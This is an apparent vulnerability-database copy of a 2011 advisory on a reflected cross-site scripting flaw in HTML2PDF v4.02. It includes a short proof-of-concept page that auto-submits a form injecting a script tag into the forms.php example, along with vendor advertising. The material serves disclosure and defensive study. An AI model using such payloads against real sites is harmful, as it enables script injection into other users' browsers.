Lucene search
K

HTML2PDF 4.02 Cross Site Scripting

🗓️ 16 May 2011 00:00:00Reported by AutoSec ToolsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

HTML2PDF v4.02 Cross Site Scripting vulnerability, Low threat level, Reflected XSS, Windows Vista + XAMPP, exploit via arbitrary JavaScript executio

Code
`<!------------------------------------------------------------------------  
# Software................HTML2PDF v4.02  
# Vulnerability...........Reflected Cross-site Scripting  
# Threat Level............Low (1/5)  
# Download................http://html2pdf.fr/  
# Discovery Date..........5/12/2011  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................AutoSec Tools  
# Site....................http://www.autosectools.com/  
# Email...................John Leitch <[email protected]>  
# ------------------------------------------------------------------------  
#   
#   
# --Description--  
#   
# A reflected cross-site scripting vulnerability in HTML2PDF v4.02 can  
# be exploited to execute arbitrary JavaScript.  
#   
#   
# --PoC-->  
  
<html>  
<body onload="document.forms[0].submit()">  
<form method="POST" action="http://localhost/html2pdf_v4.02/examples/forms.php?vuehtml=0%3cScRiPt%3ealert(0)%3c%2fScRiPt%3e">  
<input type="hidden" name="test" value="<script>alert(0)</script>" />  
  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation